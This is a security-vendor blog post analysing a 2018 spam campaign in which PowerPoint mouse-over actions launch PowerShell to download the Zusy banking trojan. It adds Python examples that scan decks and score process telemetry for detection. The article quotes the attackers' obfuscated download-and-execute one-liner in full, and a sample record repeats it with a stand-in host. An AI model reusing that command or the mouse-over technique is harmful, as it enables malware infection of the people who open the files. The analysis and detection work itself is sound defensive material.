A new malware campaign is delivering PowerPoint files with malicious links that can infect victims via mouse-over, with no clicking or enabling of macros necessary.
Attackers have been spotted experimenting with a tricky new method of delivering malware via PowerPoint files. This particular technique exploits the feature in PowerPoint that enables mouse-over actions, abusing it to launch a PowerShell command that triggers the infection process.
It's a relatively novel approach compared to the tried-and-true tactic of abusing macros in malicious Microsoft Word docs that attackers have been using for years. The good news is that users still have to jump through some fairly cumbersome hoops for this attack to work. The even better news is that even if it does get launched, Barkly blocks this attack from succeeding before any damage is done.
Let's take a closer look at how this attack works.
Hiding malware in Microsoft Office files has long been a favorite go-to trick for attackers, but the way they usually go about it is by tricking users into opening a malicious document (most commonly a Word doc) and enabling macros.
Macros are basically commands that can automate tasks and provide additional functionality — so you can understand why attackers might be into leveraging them. Some of the most prolific malware in recent years (Locky ransomware and the Dridex banking trojan are just two examples) has been primarily delivered via malicious macros hidden in Word document email attachments, prompting many security vendors and experts to recommend disabling macros by default.
This attack stands apart by not relying on macros. Instead, it leverages the command-launching functionality that PowerPoint's mouse-over actions provide: the Action Settings for a hyperlinked object can be configured to run a program, and that program can be PowerShell.
Looking at the Action Settings in the malicious PowerPoint file, we can actually see the PowerShell command designed to call out and download the additional malware:
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\"); Invoke-Item \"$env:temp\ii.jse\""
When a user opens one of the malicious PowerPoint files they're presented with a single slide with large hyperlinked text that reads, "Loading...Please wait".
By using a mouse-over action, the attackers have booby-trapped the file to automatically trigger a malicious PowerShell command as soon as a user hovers over the link. In other words, a user doesn't even have to click on the link to initiate the infection process.
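Because the action and its command line are stored inside the file, this technique can be hunted for statically, without opening the deck in PowerPoint. A .pptx/.ppsx is an OOXML zip: each slide is ppt/slides/slideN.xml, a run's `a:hlinkMouseOver` or `a:hlinkClick` element carries `action="ppaction://program"`, and the `r:id` it references resolves, through the slide's .rels part, to a percent-encoded `Target` holding the command. The scanner below is an added example written for this article, not code from Barkly or from the researchers cited; it flags `program`, `macro` and `ole` actions (only `program` is described on this page), and the miniature package it scans is constructed inline with a harmless stand-in command rather than the real one.

```python
import io
import posixpath
import re
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import unquote

# OOXML namespaces used by PresentationML slides and their relationship parts.
NS = {
    "a": "http://schemas.openxmlformats.org/drawingml/2006/main",
    "p": "http://schemas.openxmlformats.org/presentationml/2006/main",
    "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
    "rel": "http://schemas.openxmlformats.org/package/2006/relationships",
}
R_ID = "{%s}id" % NS["r"]

# Hyperlink actions that do something other than open a URL or jump to a slide.
# "program" (run an external program) is the one this campaign abuses.
RISKY_ACTIONS = ("ppaction://program", "ppaction://macro", "ppaction://ole")


def _slide_rels(zf, slide_path):
    """Map relationship Id -> Target for one slide (ppt/slides/_rels/slideN.xml.rels)."""
    folder, name = posixpath.split(slide_path)
    rels_path = posixpath.join(folder, "_rels", name + ".rels")
    rels = {}
    if rels_path in zf.namelist():
        root = ET.fromstring(zf.read(rels_path))
        for rel in root.findall("rel:Relationship", NS):
            rels[rel.get("Id")] = rel.get("Target", "")
    return rels


def find_program_actions(pptx_bytes):
    """Return every hlinkClick/hlinkMouseOver whose action runs a program, macro or OLE verb."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        for path in sorted(zf.namelist()):
            if not re.fullmatch(r"ppt/slides/slide\d+\.xml", path):
                continue
            rels = _slide_rels(zf, path)
            root = ET.fromstring(zf.read(path))
            for trigger in ("hlinkMouseOver", "hlinkClick"):
                for el in root.iter("{%s}%s" % (NS["a"], trigger)):
                    action = el.get("action", "")
                    if not action.startswith(RISKY_ACTIONS):
                        continue
                    # The command line itself lives in the .rels part, percent-encoded.
                    target = rels.get(el.get(R_ID), "")
                    findings.append({"slide": path, "trigger": trigger,
                                     "action": action, "command": unquote(target)})
    return findings


# --- Constructed sample package (not a real malware sample) -------------------
# One slide with a booby-trapped mouse-over run and one ordinary web hyperlink.
SAMPLE_SLIDE = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="{a}" xmlns:r="{r}" xmlns:p="{p}">
  <p:cSld><p:spTree>
    <p:sp><p:txBody><a:p><a:r>
      <a:rPr lang="en-US"><a:hlinkMouseOver r:id="rId2" action="ppaction://program"/></a:rPr>
      <a:t>Loading...Please wait</a:t>
    </a:r></a:p></p:txBody></p:sp>
    <p:sp><p:txBody><a:p><a:r>
      <a:rPr lang="en-US"><a:hlinkClick r:id="rId3"/></a:rPr>
      <a:t>Ordinary web link (must not be flagged)</a:t>
    </a:r></a:p></p:txBody></p:sp>
  </p:spTree></p:cSld>
</p:sld>""".format(**NS)

# The "command" here is a harmless placeholder standing in for the attacker's one-liner.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{rel}">
  <Relationship Id="rId2" Type="{r}/hyperlink" TargetMode="External"
    Target="powershell%20-NoP%20-W%20Hidden%20-c%20%22Write-Host%20constructed-sample%22"/>
  <Relationship Id="rId3" Type="{r}/hyperlink" TargetMode="External"
    Target="https://example.com/"/>
</Relationships>""".format(**NS)


def build_sample_ppsx():
    """Minimal .ppsx-like zip containing just the slide and its .rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", SAMPLE_SLIDE)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_program_actions(build_sample_ppsx()):
        print("{slide}: {trigger} -> {action}\n    {command}".format(**hit))
```

Point `find_program_actions` at the bytes of any suspicious deck (for example from a mail gateway quarantine) and treat a non-empty result as a reason to block the file; a legitimate business presentation has no reason to carry a `ppaction://program` hyperlink.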
What makes this potentially so dangerous is that users are routinely told to hover over links to determine the URL path as a security best practice. Unfortunately, in this case that advice will result in them getting infected.
The good news is that if the user is running an updated version of Microsoft Office, the Protected View feature should be enabled by default for files that arrive as email attachments or downloads, and a deck opened in Protected View does not run the mouse-over action. If the user exits Protected View and then hovers over the link, PowerPoint displays a Microsoft PowerPoint Security Notice warning of the dangers of allowing an external program to run and offering the option to disable it.
If the user chooses to enable the program, however, the PowerShell command calls out to a server to grab the additional components needed to complete the attack (for more details, see this analysis from researcher Ruben Dodge).
This is the point at which having Barkly installed on the endpoint would automatically block the attempted attack in progress.
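For teams without that kind of endpoint protection, the same moment is visible in process-creation telemetry: PowerPoint (POWERPNT.EXE) becomes the parent of powershell.exe, and the command line carries the traits of the one-liner shown above (hidden window, non-interactive, profile skipped, execution policy bypassed, a download cradle, `[char]` obfuscation and a script dropped in %TEMP%). The scorer below is an added example written for this article, not a Barkly detection or any vendor's rule; it uses Sysmon Event ID 1 style field names (ParentImage, Image, CommandLine) and runs over three constructed records, one of which is the page's command with the hostname replaced by example.invalid.

```python
import re

OFFICE_PARENTS = {"powerpnt.exe", "pptview.exe", "winword.exe", "excel.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits of the campaign's one-liner; each match adds one to the score.
INDICATORS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("non-interactive", re.compile(r"-noni(?:nteractive)?\b", re.I)),
    ("no profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("execution policy bypass", re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I)),
    ("download cradle", re.compile(
        r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)),
    ("[char] obfuscation", re.compile(r"\[char\]\s*0x[0-9a-f]{2}", re.I)),
    ("script dropped in %TEMP%", re.compile(r'\$env:temp\\[^\s"]+\.(?:jse?|vbs|hta|ps1)', re.I)),
]


def score_event(ev):
    """Return (score, reasons) for one process-creation record; 0 means not an Office->shell spawn."""
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if parent not in OFFICE_PARENTS or image not in SHELLS:
        return 0, []
    reasons = ["%s spawned %s" % (parent, image)]   # the parent/child pair alone is worth a point
    for name, rx in INDICATORS:
        if rx.search(ev["CommandLine"]):
            reasons.append(name)
    return len(reasons), reasons


def alerts(events, threshold=3):
    """Records scoring at or above the threshold, as (ProcessId, score, reasons)."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append((ev["ProcessId"], score, reasons))
    return out


# Constructed records (not real telemetry). The first mirrors the command on this page
# with the attacker's hostname swapped for example.invalid.
SAMPLE_EVENTS = [
    {"ProcessId": 4212, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'example.invalid'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\"); Invoke-Item \"$env:temp\ii.jse\""'''},
    {"ProcessId": 5180, "ParentImage": r"C:\Windows\explorer.exe",       # admin script, not Office
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoP -W Hidden -File C:\scripts\inventory.ps1"},
    {"ProcessId": 6020, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",                            # Office->shell, nothing else
     "CommandLine": r"cmd.exe /c echo constructed-benign"},
]

if __name__ == "__main__":
    for pid, score, reasons in alerts(SAMPLE_EVENTS):
        print(pid, score, "; ".join(reasons))
```

The threshold keeps a bare Office-to-shell spawn (common in environments with add-ins and login scripts) as a low-severity hunt lead while the full one-liner lights up every indicator; tune the threshold against your own baseline before alerting on it.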
The current payload being delivered by this attack has been identified as a variant of the Zusy banking trojan (aka Tinba or Tiny Banker). First discovered back in 2012, Zusy is known for "man-in-the-browser" attacks — adding convincing pop-up forms to legitimate banking websites in order to steal visitor credentials.
[Image: A fake pop-up form injected by the Tinba banking trojan. Source: Avast]
The PowerPoint files are being distributed as attachments in spam emails disguised as invoices or payment confirmations with subject lines like "Purchase Order #XXXXXX" and "Confirmation".
The PowerPoint files themselves are being named variations of "order.ppsx," "invoice.ppsx," or "order&prsn.ppsx."
Jonathan covers the latest threats and cybersecurity trends from a practical point of view.
© 2018 All Rights Reserved. Barkly is a registered trademark of Barkly Protects, Inc. | Privacy Policy and Terms of Service